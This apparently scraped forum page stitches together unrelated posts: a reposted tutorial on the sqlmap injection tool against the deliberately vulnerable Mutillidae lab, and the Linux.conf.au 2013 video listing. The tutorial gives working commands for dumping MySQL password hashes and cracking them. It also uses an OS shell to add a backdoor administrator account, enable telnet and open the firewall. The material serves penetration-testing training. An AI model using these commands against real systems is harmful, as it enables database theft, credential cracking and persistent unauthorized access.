Nytro

+ Java SE Proof Of Concept Code ? Packet Storm

[h=1]Video Tutorial: Basics of using sqlmap automated sql injection audit tool[/h]Posted by webpwnized in Information Security on Feb 6, 2013 6:01:03 AM Author: Jeremy Druin Twitter: @webpwnized YouTube Channel: webpwnized's channel - YouTube Software required: Backtrack 5 R3 with sqlmap, Mutillidae Web Pen Test Training Environment (hxxp://sourceforge.net/projects/mutillidae/files/mutillidae-project/) ecorded at the ISSA Kentuckiana February 2013 Workshop, this video review the use of sqlmap; an automated sql injection audit tool. The video walks through using sqlmap to locate an sql injection, determine the backend database type, enumerate the database account, databases, schema, tables, columns and password hashes, then use the database to compromise the windows host. Dumping data, arguably the primary use of sqlmap, is covered only briefly since there is large amounts of documentation on this feature already. Environment The environment is a Backtrack 5 R3 "attacker" at IP 192.168.56.101 and a Windows XP "victim" at 192.168.56.102 running as virtual machines on Oracle VirtualBox. The Windows XP host is running XAMPP on which Mutillidae is installed. Mutillidae may also be installed on WAMPP or LAMP stacks including being able to be installed on Linux. Using two hosts is not neccesary to recreate the lab exercise. All of the items can be reproduced on "localhost". The database was created by installing XAMPP, unzipping the Mutillidae files into the C:\xampp\htdocs\ directory, then clicking the "Set up database" button in Mutillidae. Mutillidae has a deliberately vulnerable login page against which the sql injection was carried out. Notes from Presentation Please find notes from the talk below which can be used to follow along with the video. -------------------------------------------------- Running SQLMAP Help -------------------------------------------------- --help Help -hh Double the help -------------------------------------------------- Running SQLMAP "Manually" -------------------------------------------------- ./sqlmap.py --url="http://192.168.56.102/mutillidae/index.php?page=login.php" --data="username=asdf&password=asdf&login-php-submit-button=Login" --banner -------------------------------------------------- Capturing Request To Pass To SQLMAP -------------------------------------------------- URL: http://192.168.56.102/mutillidae/index.php?page=login.php Request: POST /mutillidae/index.php?page=login.php HTTP/1.1 Host: 192.168.56.102 User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:17.0) Gecko/20100101 Firefox/17.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.56.102/mutillidae/index.php?page=login.php Cookie: showhints=0; PHPSESSID=fik978dbhcujcgdjfc2lg249r4 Content-Type: application/x-www-form-urlencoded Content-Length: 57 username=asdf&password=asdf&login-php-submit-button=Login -------------------------------------------------- Running SQLMAP with "auto-parse" -------------------------------------------------- ./sqlmap.py -r ~/engagements/sqlmap/login.php.request <options> -------------------------------------------------- Running SQLMAP with various features -------------------------------------------------- ./sqlmap.py -r ~/engagements/sqlmap/login.php.request <options> --banner web server operating system: Windows web application technology: PHP 5.4.4, Apache 2.4.2 back-end DBMS: MySQL 5.0 banner: '5.5.25a' --fingerprint web server operating system: Windows web application technology: PHP 5.4.4, Apache 2.4.2 back-end DBMS: active fingerprint: MySQL >= 5.5.0 --current-user Retrieve DBMS current user --current-db Retrieve DBMS current database --hostname Retrieve DBMS server hostname --is-dba Detect if the DBMS current user is DBA current user: 'root@localhost' current database: 'nowasp' current user is DBA: True hostname: 'mutillid-7se1xr' --users Enumerate DBMS users --passwords Enumerate DBMS users password hashes database management system users [*] ''@'localhost' [*] 'pma'@'localhost' [*] 'root'@'linux' [*] 'root'@'localhost' --dbs Enumerate DBMS databases available databases[10]: [*] cdcol [*] information_schema [*] mysql [*] nowasp [*] owasp10 [*] owasp13 [*] performance_schema [*] phpmyadmin [*] test [*] webauth -------------------------------------------------------------------------------- -------------------- Enumerate DBMS database tables, columns, structure (schema) -------------------------------------------------------------------------------- -------------------- --tables Enumerate DBMS database tables --columns Enumerate DBMS database table columns --schema Enumerate DBMS schema --count Retrieve number of entries for table(s) --exclude-sysdbs Exclude DBMS system databases when enumerating tables -D DB DBMS database to enumerate -T TBL DBMS database table to enumerate -C COL DBMS database table column to enumerate -U USER DBMS user to enumerate -------------------------------------------------- Extracting data -------------------------------------------------- --dump Dump DBMS database table entries --dump-all Dump all DBMS databases tables entries -D DB DBMS database to enumerate -T TBL DBMS database table to enumerate -C COL DBMS database table column to enumerate -U USER DBMS user to enumerate --exclude-sysdbs Exclude DBMS system databases when enumerating tables --start=LIMITSTART First query output entry to retrieve --stop=LIMITSTOP Last query output entry to retrieve --sql-query=QUERY SQL statement to be executed --sql-shell Prompt for an interactive SQL shell -------------------------------------------------- Listing columns from tables -------------------------------------------------- ./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql -T user --columns ./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql -T user --common-columns ./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql --sql-query="select column_name from information_schema.columns where table_name = 'user'" select column_name from information_schema.columns where table_name = 'user' [42]: [*] Alter_priv [*] Alter_routine_priv [*] authentication_string [*] Create_priv [*] Create_routine_priv [*] Create_tablespace_priv [*] Create_tmp_table_priv [*] Create_user_priv [*] Create_view_priv [*] Delete_priv [*] Drop_priv [*] Event_priv [*] Execute_priv [*] File_priv [*] Grant_priv [*] Host [*] Index_priv [*] Insert_priv [*] Lock_tables_priv [*] max_connections [*] max_questions [*] max_updates [*] max_user_connections [*] Password [*] plugin [*] Process_priv [*] References_priv [*] Reload_priv [*] Repl_client_priv [*] Repl_slave_priv [*] Select_priv [*] Show_db_priv [*] Show_view_priv [*] Shutdown_priv [*] ssl_cipher [*] ssl_type [*] Super_priv [*] Trigger_priv [*] Update_priv [*] User [*] x509_issuer [*] x509_subject -------------------------------------------------- Advanced: Modifying injections -------------------------------------------------- SELECT * FROM accounts WHERE username='' AND password=''' ./sqlmap.py -r ~/engagements/sqlmap/login.php.request --prefix="SELECT * FROM accounts WHERE username='" --suffix="'-- " --banner --prefix=PREFIX Injection payload prefix string --suffix=SUFFIX Injection payload suffix string -------------------------------------------------- Advanced: Dealing with inconsistent results -------------------------------------------------- select User, Password from mysql.user versus ./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql --sql-query="select User, Password from mysql.user order by User desc" select User, Password from mysql.user order by User desc select User, Password, Host, authentication_string from mysql.user order by User desc [9]: [*] root, , localhost, [*] root, , linux, [*] pma, , localhost, [*] Simba, *F43B942A34347297C3B0455DAB190AFB9BBF13B5, localhost, [*] Rocky, *2BA8DF85753BE61F6C72A8784B11E68A41878032, localhost, [*] Patches, *2027D9391E714343187E07ACB41AE8925F30737E, localhost, [*] Happy, *160E7D8EE3A97BED0F0AD1563BFB619178D15D7B, localhost, [*] , , localhost, [*] , , linux, -------------------------------------------------- Cracking MySQL Password Hashes -------------------------------------------------- John the Ripper Command Line /pentest/passwords/john/john --format=mysql-sha1 /tmp/mysql.hashes Password Hashes in MySQL Format Simba:*F43B942A34347297C3B0455DAB190AFB9BBF13B5 Rocky:*2BA8DF85753BE61F6C72A8784B11E68A41878032 Patches:*2027D9391E714343187E07ACB41AE8925F30737E Happy:*160E7D8EE3A97BED0F0AD1563BFB619178D15D7B -------------------------------------------------- Understanding sqlmap O/S Shell -------------------------------------------------- View transaction: tcpdump -i eth1 -vvv -X 1st Stage Uploader 2nd Stage Command Shell Page sc query state= all sc query tlntsvr sc config tlntsvr start= demand sc start tlntsvr net user root toor /add net localgroup TelnetClients /add net localgroup Administrators root /add net localgroup TelnetClients root /add netsh firewall add portopening protocol=TCP port=23 name=telnet mode=enable scope=custom addresses=192.168.56.101 -------------------------------------------------- Interacting Directly with sqlmap O/S Shell Backdoor -------------------------------------------------- http://192.168.56.102/<temp file name>?cmd=ping%20192.168.56.101 -------------------------------------------------- Direct connection to the database -------------------------------------------------- Installing Py-MySQL Dependency git clone https://github.com/petehunt/PyMySQL/ cd PyMySQL python setup.py install cd .. rm -rf PyMySQL ./sqlmap.py -d mysql://root:""@192.168.56.102:5123/OWASP10 Sursa: https://community.rapid7.com/community/infosec/blog/2013/02/06/video-tutorial-basics-of-using-sqlmap-automated-sql-injection-audit-tool

Linux.conf.au 2013 Videos We've released these videos as quickly as possible so that people can enjoy the many great talks at LCA this year, and so we can get our rendering gear out of the venue. We know some of these may have problems, but most of them are working and tested. Please let us know if there's anything that is mistitled, short or otherwise incorrect and we'll deal with it as soon as possible. Helpful debugging information: if the closing screen (the balloons over old Parliament House) doesn't show at the end of the talk, then the file was partly rendered but the render machine probably locked up. If the closing screen shows but the talk was incomplete, then some parts of the talk may be missing, or we might simply have mistakenly unselected one of the raw video files. The former case is easily recoverable; the latter may be impossible to fix without a time machine but may also be recoverable. Let us know either way Things we can't fix: Sir Tim Berners-Lee's keynote on Friday and DSD and Open Source on Wednesday. We don't have permission to record the video for those talks. Sorry, if you weren't there, you've missed it Videos we know have problems: Bdale Garbee's Keynote on Monday - missing. Unfortunately our video capture system failed on us and we captured this on four DV tapes. I've got the 32GB of video of this on a hard disk, and I've cut together a full video in PiTiVi but it seems to refuse to render it. I will be trying Cinelerra to see if that works, or if restarting my PiTiVi project from scratch fixes it. This is a long job and will have to wait for the moment - Paul, 5/2/13. Miniconf videos. These were captured and are on file but the schedule in the video processing system is out of date. I'm going to try importing the latest schedule and seeing if that fixes it without also breaking every other talk. If not, I'll recreate the schedule by hand - Paul, 5/2/13. Ain't No Party Like A Unix Party - mislabeled talk (thanks Tim Suess). Daniel Black notes that this might be mislabeled as 'Touch And Go - Modern User Interfaces Using Open Source. This is probably a schedule mismatch and hopefully an easy fix - Paul, 5/2/13. Why Kernel space sucks - audio drops at end (thanks Neil Brown). This is probably unrecoverable but I'll review it - Paul, 5/2/13. Bufferbloat from a Plumber's point of viewi (mp4) - only the end of the talk (thanks Dave Taht and Andrew McDonnell). This may be a missing or incorrectly skipped DV file - will review - Paul, 5/2/13. The future of nonvolatile memory (ogv) - truncated (thanks Neil Brown). Probably one of the render nodes locked up during rendering - will re-render - Paul, 5/2/13. High Speed Data Acquisition - missing (thanks Andrew McDonnell). I know we have this talk, I'm just not sure why it hasn't been rendered - will fix - Paul, 5/2/13. Copyright's Dark Clouds - Optus v NRL (ogv), Free and Open Source Software and Activism (ogv), Openstack on Openstack - a single management API for all your servers (ogv and mp4), and Using open source in over 1100 schools in New Zealand (ogv) - all truncated (thanks Ambrose Andrews, Robert Collins and Daniel Bryant). These are definitely rendering errors and we'll rebuild them - Paul, 5/2/13. The IPocalypse 20 months later (mp4) and RealTime Response on Multicore Systems - It is bigger than I thought (mp4) - both shorter than expected (thanks Ashley Hull). Probably render node failure, will reprocess - Paul, 5/2/13. Linux Gaming At Last - Tuning Open Source Graphics Drivers for Valve Software (ogv) - seems to skip at about 0:12:39 and resolve the problem soon after (thanks Phil Ingram). This may have been a rendering issue, will reprocess to try and fix it - Paul, 6/2/13. Thanks to everyone who's reported problems - it's not a perfect system, but check back here after Wednesday 6th February for updates. The overall response to getting the videos up quickly rather than perfectly has been very positive - thanks for your support! Paul Wayper, AV Wrangler [TABLE] [TR] [TD][/TD] [TD]Parent Directory[/TD] [TD] [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]3D_Printing_with_Repsnapper.mp4[/TD] [TD=align: right]02-Feb-2013 18:00 [/TD] [TD=align: right] 88M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]15MW_and_3600_penguins_in_a_room_Supercomputing_at_ANU.mp4[/TD] [TD=align: right]03-Feb-2013 17:42 [/TD] [TD=align: right] 91M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]A_New_Linux_Platform_Hardware_and_Software.mp4[/TD] [TD=align: right]03-Feb-2013 16:55 [/TD] [TD=align: right] 81M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]After_Arduino.mp4[/TD] [TD=align: right]04-Feb-2013 10:13 [/TD] [TD=align: right] 66M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]An_Introduction_to_Linux_IPC_Facilities.mp4[/TD] [TD=align: right]03-Feb-2013 12:21 [/TD] [TD=align: right]260M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]ArduSat_Open_Source_in_orbit.mp4[/TD] [TD=align: right]02-Feb-2013 19:21 [/TD] [TD=align: right] 86M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Beyond_Alt_Text_What_Every_Project_Should_Know_About_Accessibility.mp4[/TD] [TD=align: right]04-Feb-2013 09:45 [/TD] [TD=align: right] 58M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Big_and_Little_Endian_inside_out.mp4[/TD] [TD=align: right]04-Feb-2013 10:25 [/TD] [TD=align: right]112M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Bufferbloat_from_a_Plumbers_point_of_view.mp4[/TD] [TD=align: right]02-Feb-2013 17:46 [/TD] [TD=align: right]7.6M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Building_Persona_federated_and_privacysensitive_identity_for_the_Web.mp4[/TD] [TD=align: right]03-Feb-2013 17:41 [/TD] [TD=align: right] 23M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Building_a_free_software_telemetry_radio_system.mp4[/TD] [TD=align: right]02-Feb-2013 21:05 [/TD] [TD=align: right] 63M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Ceph_Managing_A_Distributed_Storage_System_At_Scale.mp4[/TD] [TD=align: right]03-Feb-2013 17:42 [/TD] [TD=align: right] 81M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Ceph_object_storage_block_storage_file_system_replication_massive_scalability_and_then_some.mp4[/TD] [TD=align: right]03-Feb-2013 16:18 [/TD] [TD=align: right]155M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Checkpoint_and_Restore_are_we_there_yet.mp4[/TD] [TD=align: right]02-Feb-2013 18:51 [/TD] [TD=align: right] 48M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Code_up_your_own_video_conference_in_HTML5.mp4[/TD] [TD=align: right]02-Feb-2013 19:08 [/TD] [TD=align: right] 66M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Concurrent_Programming_with_the_Disruptor.mp4[/TD] [TD=align: right]02-Feb-2013 20:05 [/TD] [TD=align: right] 54M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Conference_Closing.mp4[/TD] [TD=align: right]03-Feb-2013 17:35 [/TD] [TD=align: right]210M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Conference_Closing_Lightning_Talks.mp4[/TD] [TD=align: right]03-Feb-2013 17:20 [/TD] [TD=align: right]124M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Copyrights_Dark_Clouds_Optus_v_NRL.mp4[/TD] [TD=align: right]02-Feb-2013 19:11 [/TD] [TD=align: right]3.0M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Designing_a_Verifiable_and_Accessible_Electronic_Voting_System.mp4[/TD] [TD=align: right]02-Feb-2013 20:07 [/TD] [TD=align: right]2.5M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Droids_that_talk_Pairing_Codec2_and_Android.mp4[/TD] [TD=align: right]04-Feb-2013 13:20 [/TD] [TD=align: right] 31M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Free_and_open_source_software_and_activism.mp4[/TD] [TD=align: right]04-Feb-2013 13:10 [/TD] [TD=align: right]167K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Future_directions_for_the_X_Window_System.mp4[/TD] [TD=align: right]04-Feb-2013 09:45 [/TD] [TD=align: right] 87M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Geeks_rule_over_kings_the_Distributed_Democracy.mp4[/TD] [TD=align: right]02-Feb-2013 19:20 [/TD] [TD=align: right]3.0M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Getting_older_Tips_tricks_for_designing_inclusive_open_source_user_interfaces.mp4[/TD] [TD=align: right]02-Feb-2013 18:48 [/TD] [TD=align: right] 31M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Git_For_Ages_4_And_Up.mp4[/TD] [TD=align: right]02-Feb-2013 22:52 [/TD] [TD=align: right]342M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Git_not_just_for_source_code_anymore.mp4[/TD] [TD=align: right]02-Feb-2013 20:29 [/TD] [TD=align: right] 74M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Graphics_from_Gamepads_Guitars_and_Gadgets_Galore.mp4[/TD] [TD=align: right]03-Feb-2013 18:12 [/TD] [TD=align: right] 83M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]HEADER.html[/TD] [TD=align: right]06-Feb-2013 11:05 [/TD] [TD=align: right]4.4K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Heat_Orchestrating_multiple_cloud_applications_on_OpenStack_using_templates.mp4[/TD] [TD=align: right]03-Feb-2013 16:38 [/TD] [TD=align: right] 87M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]How_Mozilla_draws_the_line_between_configuration_and_data_while_using_configuration_management_tools.mp4[/TD] [TD=align: right]04-Feb-2013 09:27 [/TD] [TD=align: right] 69M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]How_to_Fix_a_Font.mp4[/TD] [TD=align: right]03-Feb-2013 00:15 [/TD] [TD=align: right] 77M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]How_to_make_almost_anything_go_faster.mp4[/TD] [TD=align: right]03-Feb-2013 00:02 [/TD] [TD=align: right] 51M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]How_to_use_Puppet_like_an_Adult.mp4[/TD] [TD=align: right]03-Feb-2013 11:56 [/TD] [TD=align: right] 85M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Keynote_Andrew_Bunnie_Huang.mp4[/TD] [TD=align: right]03-Feb-2013 01:37 [/TD] [TD=align: right] 77M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Keynote_Radia_Perlman.mp4[/TD] [TD=align: right]03-Feb-2013 11:33 [/TD] [TD=align: right]117M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]LTTng_20_Advanced_Linux_tracing_for_everyone.mp4[/TD] [TD=align: right]04-Feb-2013 12:19 [/TD] [TD=align: right] 86M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Lighting_up_OpenCV_with_Ne10_and_NEON.mp4[/TD] [TD=align: right]04-Feb-2013 09:34 [/TD] [TD=align: right] 56M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Linux_Gaming_at_Last_Tuning_Open_Source_Graphics_Drivers_for_Valve_Software.mp4[/TD] [TD=align: right]02-Feb-2013 20:19 [/TD] [TD=align: right] 35M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Main_conference_opening.mp4[/TD] [TD=align: right]02-Feb-2013 17:57 [/TD] [TD=align: right] 84M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Make_your_software_understand_your_nonUS_accent.mp4[/TD] [TD=align: right]02-Feb-2013 19:08 [/TD] [TD=align: right] 58M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Making_Mobile_Communications_Secure.mp4[/TD] [TD=align: right]04-Feb-2013 11:05 [/TD] [TD=align: right]116M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Making_RCU_Respect_Your_Devices_Battery_Lifetime.mp4[/TD] [TD=align: right]02-Feb-2013 19:34 [/TD] [TD=align: right] 71M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Making_UEFI_Secure_boot_work_for_you.mp4[/TD] [TD=align: right]02-Feb-2013 21:02 [/TD] [TD=align: right] 79M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Maximum_Clojure_Performance.mp4[/TD] [TD=align: right]02-Feb-2013 21:04 [/TD] [TD=align: right] 71M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Measuring_and_Improving_OpenGL_Performance.mp4[/TD] [TD=align: right]02-Feb-2013 22:03 [/TD] [TD=align: right] 59M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]MySQL_in_the_cloud_as_a_service.mp4[/TD] [TD=align: right]03-Feb-2013 17:17 [/TD] [TD=align: right]166M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]NetFPGA_USB_2_interface.mp4[/TD] [TD=align: right]02-Feb-2013 22:40 [/TD] [TD=align: right]148M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]NovaProva_or_How_I_Did_Six_Impossible_Things_Before_LCA.mp4[/TD] [TD=align: right]03-Feb-2013 16:41 [/TD] [TD=align: right] 97M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]OWASP_Developer_Guide_2013_what_it_means_for_open_source_projects.mp4[/TD] [TD=align: right]04-Feb-2013 12:24 [/TD] [TD=align: right] 81M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]OpenStack_Zuul.mp4[/TD] [TD=align: right]04-Feb-2013 09:53 [/TD] [TD=align: right] 78M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Open_Source_Digital_Radio.mp4[/TD] [TD=align: right]03-Feb-2013 00:06 [/TD] [TD=align: right] 79M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Open_Source_Firmware.mp4[/TD] [TD=align: right]04-Feb-2013 13:05 [/TD] [TD=align: right] 47M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Open_Source_and_Open_Data_for_Humanitarian_Response_with_OpenStreetMap.mp4[/TD] [TD=align: right]03-Feb-2013 00:03 [/TD] [TD=align: right] 96M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Openstack_on_Openstack_a_single_management_API_for_all_your_servers.mp4[/TD] [TD=align: right]04-Feb-2013 09:17 [/TD] [TD=align: right]1.4M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Playing_with_OpenStack_Swift.mp4[/TD] [TD=align: right]03-Feb-2013 11:57 [/TD] [TD=align: right] 95M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Ponies_and_Rainbows_Clutter_20_and_GTK_40.mp4[/TD] [TD=align: right]03-Feb-2013 17:44 [/TD] [TD=align: right]106M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]PostgreSQL_92_Full_Throttle_Database.mp4[/TD] [TD=align: right]03-Feb-2013 16:09 [/TD] [TD=align: right] 96M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Pre_dinner_thingy_robert_llewellyn_and_simon_hackett.mp4[/TD] [TD=align: right]03-Feb-2013 16:42 [/TD] [TD=align: right] 93M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Quantitative_community_management.mp4[/TD] [TD=align: right]03-Feb-2013 16:07 [/TD] [TD=align: right] 99M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Quiltwork_patch_deployment_in_nz_and_au.mp4[/TD] [TD=align: right]02-Feb-2013 23:11 [/TD] [TD=align: right] 72M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]RAID_is_more_than_parity_and_mirrors.mp4[/TD] [TD=align: right]04-Feb-2013 10:04 [/TD] [TD=align: right]122M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]REPENT_FOR_THE_END_OF_THE_UNIX_EPOCH_IS_NIGH.mp4[/TD] [TD=align: right]02-Feb-2013 20:19 [/TD] [TD=align: right] 74M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]RealTime_Response_on_Multicore_Systems_It_Is_Bigger_Than_I_Thought.mp4[/TD] [TD=align: right]02-Feb-2013 19:12 [/TD] [TD=align: right] 23M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Rethinking_CPU_hotplug_for_elegance_and_efficiency.mp4[/TD] [TD=align: right]02-Feb-2013 20:04 [/TD] [TD=align: right] 90M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Ript_a_terse_but_expressive_DSL_for_iptables.mp4[/TD] [TD=align: right]02-Feb-2013 21:40 [/TD] [TD=align: right] 68M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Ristretto_runtime_types_for_JavaScript.mp4[/TD] [TD=align: right]03-Feb-2013 17:00 [/TD] [TD=align: right] 83M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Scratching_your_own_itch_subsurface_diving_log.mp4[/TD] [TD=align: right]03-Feb-2013 15:24 [/TD] [TD=align: right]118M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Shell_for_Starters.mp4[/TD] [TD=align: right]04-Feb-2013 12:09 [/TD] [TD=align: right]135M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Software_Transactional_Memory_in_GCC_47.mp4[/TD] [TD=align: right]03-Feb-2013 17:14 [/TD] [TD=align: right]151M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Stereographic_film_making_and_Linux.mp4[/TD] [TD=align: right]02-Feb-2013 23:09 [/TD] [TD=align: right] 86M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Systems_Administration_Server_and_Process_Behavior.mp4[/TD] [TD=align: right]03-Feb-2013 01:08 [/TD] [TD=align: right]282M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Teaching_Robotics_and_Embedded_Computing_with_Legos_and_Arduino.mp4[/TD] [TD=align: right]02-Feb-2013 19:25 [/TD] [TD=align: right] 41M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Teaching_the_X_server_new_tricks.mp4[/TD] [TD=align: right]04-Feb-2013 09:38 [/TD] [TD=align: right]102M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]The_IPocalypse_20_months_later.mp4[/TD] [TD=align: right]02-Feb-2013 19:25 [/TD] [TD=align: right]177K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]The_Perl_Renaissance.mp4[/TD] [TD=align: right]02-Feb-2013 20:17 [/TD] [TD=align: right] 59M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]The_Raspberry_Pi_and_Linux.mp4[/TD] [TD=align: right]02-Feb-2013 21:45 [/TD] [TD=align: right]159M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]The_future_of_nonvolatile_memory.mp4[/TD] [TD=align: right]02-Feb-2013 19:24 [/TD] [TD=align: right] 49M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]The_real_story_behind_Wayland_and_X.mp4[/TD] [TD=align: right]03-Feb-2013 15:51 [/TD] [TD=align: right] 68M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Theres_a_Party_In_Your_Box_And_Everyones_Invited.mp4[/TD] [TD=align: right]02-Feb-2013 21:21 [/TD] [TD=align: right] 47M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Think_Create_Critique_Design.mp4[/TD] [TD=align: right]02-Feb-2013 23:18 [/TD] [TD=align: right] 78M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Touch_and_Go_Modern_User_Interfaces_with_Open_Source.mp4[/TD] [TD=align: right]02-Feb-2013 23:18 [/TD] [TD=align: right]121M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Transcendent_Memory_Not_Just_for_Virtualization_Anymore.mp4[/TD] [TD=align: right]03-Feb-2013 18:40 [/TD] [TD=align: right]118M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Trinity_A_Linux_kernel_fuzz_tester_and_then_some.mp4[/TD] [TD=align: right]03-Feb-2013 00:37 [/TD] [TD=align: right] 96M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Two_years_of_LibreOffice.mp4[/TD] [TD=align: right]03-Feb-2013 00:48 [/TD] [TD=align: right]109M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]UEFI_the_Converged_Firmware_Infrastructure.mp4[/TD] [TD=align: right]02-Feb-2013 21:48 [/TD] [TD=align: right] 95M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Using_Puppet_to_Model_Application_clusters.mp4[/TD] [TD=align: right]04-Feb-2013 10:23 [/TD] [TD=align: right]101M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Using_open_source_in_over_1100_schools_in_New_Zealand.mp4[/TD] [TD=align: right]02-Feb-2013 21:49 [/TD] [TD=align: right]1.8M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Vampire_Mice_How_USB_PM_impacts_you.mp4[/TD] [TD=align: right]02-Feb-2013 23:03 [/TD] [TD=align: right]121M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Why_kernel_space_sucks.mp4[/TD] [TD=align: right]03-Feb-2013 15:51 [/TD] [TD=align: right] 63M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Wiggle_while_you_work.mp4[/TD] [TD=align: right]03-Feb-2013 13:48 [/TD] [TD=align: right] 92M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]gitannex.mp4[/TD] [TD=align: right]03-Feb-2013 18:29 [/TD] [TD=align: right] 61M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]redgrep_from_regular_expression_derivatives_to_LLVM.mp4[/TD] [TD=align: right]02-Feb-2013 18:58 [/TD] [TD=align: right] 60M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] 